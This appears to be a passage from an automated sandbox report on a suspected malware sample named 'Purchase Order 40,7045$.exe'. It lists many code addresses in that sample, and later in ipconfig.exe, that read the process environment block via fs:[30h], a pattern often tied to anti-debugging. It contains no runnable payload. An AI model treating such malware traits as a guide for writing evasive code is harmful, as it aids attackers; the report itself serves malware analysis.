          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]1_2_00FAA229
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]1_2_00FAA229
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]1_2_00FAA229
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]1_2_00FAA229
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]1_2_00FAA229
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]1_2_00FAA229
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]1_2_00FAA229
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]1_2_00FAA229
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]1_2_00FAA229
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA3A1C mov eax, dword ptr fs:[00000030h]1_2_00FA3A1C
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]1_2_00F85210
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov ecx, dword ptr fs:[00000030h]1_2_00F85210
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]1_2_00F85210
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]1_2_00F85210
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]1_2_00F8AA16
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]1_2_00F8AA16
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F98A0A mov eax, dword ptr fs:[00000030h]1_2_00F98A0A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]1_2_0104AA16
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]1_2_0104AA16
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FADBE9 mov eax, dword ptr fs:[00000030h]1_2_00FADBE9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]1_2_00FB03E2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]1_2_00FB03E2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]1_2_00FB03E2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]1_2_00FB03E2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]1_2_00FB03E2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]1_2_00FB03E2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104EA55 mov eax, dword ptr fs:[00000030h]1_2_0104EA55
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01014257 mov eax, dword ptr fs:[00000030h]1_2_01014257
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]1_2_00FB4BAD
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]1_2_00FB4BAD
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]1_2_00FB4BAD
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]1_2_0103B260
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]1_2_0103B260
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058A62 mov eax, dword ptr fs:[00000030h]1_2_01058A62
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBB390 mov eax, dword ptr fs:[00000030h]1_2_00FBB390
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2397 mov eax, dword ptr fs:[00000030h]1_2_00FB2397
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]1_2_00F91B8F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]1_2_00F91B8F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]1_2_00FB3B7A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]1_2_00FB3B7A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8DB60 mov ecx, dword ptr fs:[00000030h]1_2_00F8DB60
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8F358 mov eax, dword ptr fs:[00000030h]1_2_00F8F358
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8DB40 mov eax, dword ptr fs:[00000030h]1_2_00F8DB40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058D34 mov eax, dword ptr fs:[00000030h]1_2_01058D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0100A537 mov eax, dword ptr fs:[00000030h]1_2_0100A537
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104E539 mov eax, dword ptr fs:[00000030h]1_2_0104E539
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003540 mov eax, dword ptr fs:[00000030h]1_2_01003540
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01033D40 mov eax, dword ptr fs:[00000030h]1_2_01033D40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9849B mov eax, dword ptr fs:[00000030h]1_2_00F9849B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA746D mov eax, dword ptr fs:[00000030h]1_2_00FA746D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]1_2_010505AC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]1_2_010505AC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA44B mov eax, dword ptr fs:[00000030h]1_2_00FBA44B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]1_2_01006DC9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]1_2_01006DC9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]1_2_01006DC9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov ecx, dword ptr fs:[00000030h]1_2_01006DC9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]1_2_01006DC9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]1_2_01006DC9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBBC2C mov eax, dword ptr fs:[00000030h]1_2_00FBBC2C
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]1_2_0104FDE2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]1_2_0104FDE2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]1_2_0104FDE2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]1_2_0104FDE2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01038DF1 mov eax, dword ptr fs:[00000030h]1_2_01038DF1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]1_2_01041C06
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]1_2_0105740D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]1_2_0105740D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]1_2_0105740D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]1_2_01006C0A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]1_2_01006C0A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]1_2_01006C0A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]1_2_01006C0A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]1_2_00F9D5E0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]1_2_00F9D5E0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]1_2_00FB1DB5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]1_2_00FB1DB5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]1_2_00FB1DB5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]1_2_0101C450
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]1_2_0101C450
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB35A1 mov eax, dword ptr fs:[00000030h]1_2_00FB35A1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]1_2_00FBFD9B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]1_2_00FBFD9B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]1_2_00F82D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]1_2_00F82D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]1_2_00F82D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]1_2_00F82D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]1_2_00F82D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]1_2_00FB2581
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]1_2_00FB2581
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]1_2_00FB2581
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]1_2_00FB2581
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]1_2_00FAC577
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]1_2_00FAC577
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA7D50 mov eax, dword ptr fs:[00000030h]1_2_00FA7D50
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC3D43 mov eax, dword ptr fs:[00000030h]1_2_00FC3D43
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]1_2_00FB4D3B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]1_2_00FB4D3B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]1_2_00FB4D3B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8AD30 mov eax, dword ptr fs:[00000030h]1_2_00F8AD30
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]1_2_00F93D34
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058CD6 mov eax, dword ptr fs:[00000030h]1_2_01058CD6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]1_2_01006CF0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]1_2_01006CF0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]1_2_01006CF0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010414FB mov eax, dword ptr fs:[00000030h]1_2_010414FB
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]1_2_0105070D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]1_2_0105070D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]1_2_0101FF10
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]1_2_0101FF10
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB16E0 mov ecx, dword ptr fs:[00000030h]1_2_00FB16E0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F976E2 mov eax, dword ptr fs:[00000030h]1_2_00F976E2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB36CC mov eax, dword ptr fs:[00000030h]1_2_00FB36CC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC8EC7 mov eax, dword ptr fs:[00000030h]1_2_00FC8EC7
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058F6A mov eax, dword ptr fs:[00000030h]1_2_01058F6A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]1_2_00FAAE73
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]1_2_00FAAE73
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]1_2_00FAAE73
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]1_2_00FAAE73
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]1_2_00FAAE73
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9766D mov eax, dword ptr fs:[00000030h]1_2_00F9766D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]1_2_01007794
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]1_2_01007794
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]1_2_01007794
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]1_2_00F97E41
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]1_2_00F97E41
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]1_2_00F97E41
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]1_2_00F97E41
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]1_2_00F97E41
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]1_2_00F97E41
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8E620 mov eax, dword ptr fs:[00000030h]1_2_00F8E620
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]1_2_00FBA61C
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]1_2_00FBA61C
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]1_2_00F8C600
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]1_2_00F8C600
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]1_2_00F8C600
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB8E00 mov eax, dword ptr fs:[00000030h]1_2_00FB8E00
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC37F5 mov eax, dword ptr fs:[00000030h]1_2_00FC37F5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041608 mov eax, dword ptr fs:[00000030h]1_2_01041608
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103FE3F mov eax, dword ptr fs:[00000030h]1_2_0103FE3F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]1_2_0104AE44
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]1_2_0104AE44
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F98794 mov eax, dword ptr fs:[00000030h]1_2_00F98794
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101FE87 mov eax, dword ptr fs:[00000030h]1_2_0101FE87
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9FF60 mov eax, dword ptr fs:[00000030h]1_2_00F9FF60
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]1_2_01050EA5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]1_2_01050EA5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]1_2_01050EA5
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010046A7 mov eax, dword ptr fs:[00000030h]1_2_010046A7
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9EF40 mov eax, dword ptr fs:[00000030h]1_2_00F9EF40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103FEC0 mov eax, dword ptr fs:[00000030h]1_2_0103FEC0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBE730 mov eax, dword ptr fs:[00000030h]1_2_00FBE730
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058ED6 mov eax, dword ptr fs:[00000030h]1_2_01058ED6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]1_2_00F84F2E
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]1_2_00F84F2E
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAF716 mov eax, dword ptr fs:[00000030h]1_2_00FAF716
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]1_2_00FBA70E
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]1_2_00FBA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2AE4 mov eax, dword ptr fs:[00000030h]5_2_02EA2AE4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2ACB mov eax, dword ptr fs:[00000030h]5_2_02EA2ACB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]5_2_02E752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]5_2_02E752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]5_2_02E752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]5_2_02E752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]5_2_02E752A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]5_2_02E8AAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]5_2_02E8AAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAFAB0 mov eax, dword ptr fs:[00000030h]5_2_02EAFAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]5_2_02EAD294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]5_2_02EAD294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB927A mov eax, dword ptr fs:[00000030h]5_2_02EB927A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]5_2_02F2B260
